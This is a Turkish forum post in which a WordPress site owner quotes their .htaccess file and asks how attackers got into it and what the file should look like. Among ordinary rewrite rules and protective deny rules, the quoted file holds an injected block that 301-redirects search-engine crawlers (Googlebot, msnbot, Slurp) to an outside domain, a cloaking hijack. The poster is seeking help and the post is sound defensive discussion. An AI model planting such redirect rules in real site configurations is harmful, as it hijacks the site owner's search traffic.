arkadaşlar .htaccess dosyamda şöyle kodlar mevcut

yönlendirme yapılmış sanırım. bu adamlar nasıl ulaşıyor bu dosyalara ve bu .htaccess in doğrusu nasıl olmalıdır.

Alıntı
# BEGIN LSCACHE
END LSCACHE

# protect wpconfig.php
<files wp-config.php>
Order deny,allow
deny from all
</files>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} Googlebot [OR]
RewriteCond %{HTTP_USER_AGENT} msnbot [OR]
RewriteCond %{HTTP_USER_AGENT} Slurp
RewriteRule ^(.*)$ http://www.kureistanbul.com/$1 [L,R=301]
BEGIN WordPress

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
END WordPress

ErrorDocument 401 "Unauthorized Access"
ErrorDocument 403 "Forbidden"
<FilesMatch "wp-login.php">
AuthUserFile /home/alper/.wpadmin
</FilesMatch>
<Files xmlrpc.php>
Order allow,deny
Deny from all
</Files>
RewriteCond %{HTTP_USER_AGENT} ^.WinHttp.WinHttpRequest.5. $
RewriteRule .* http://%{REMOTE_ADDR}/ [F,L]
RewriteCond %{HTTP_USER_AGENT} ^-?$
RewriteRule ^ - [F,L]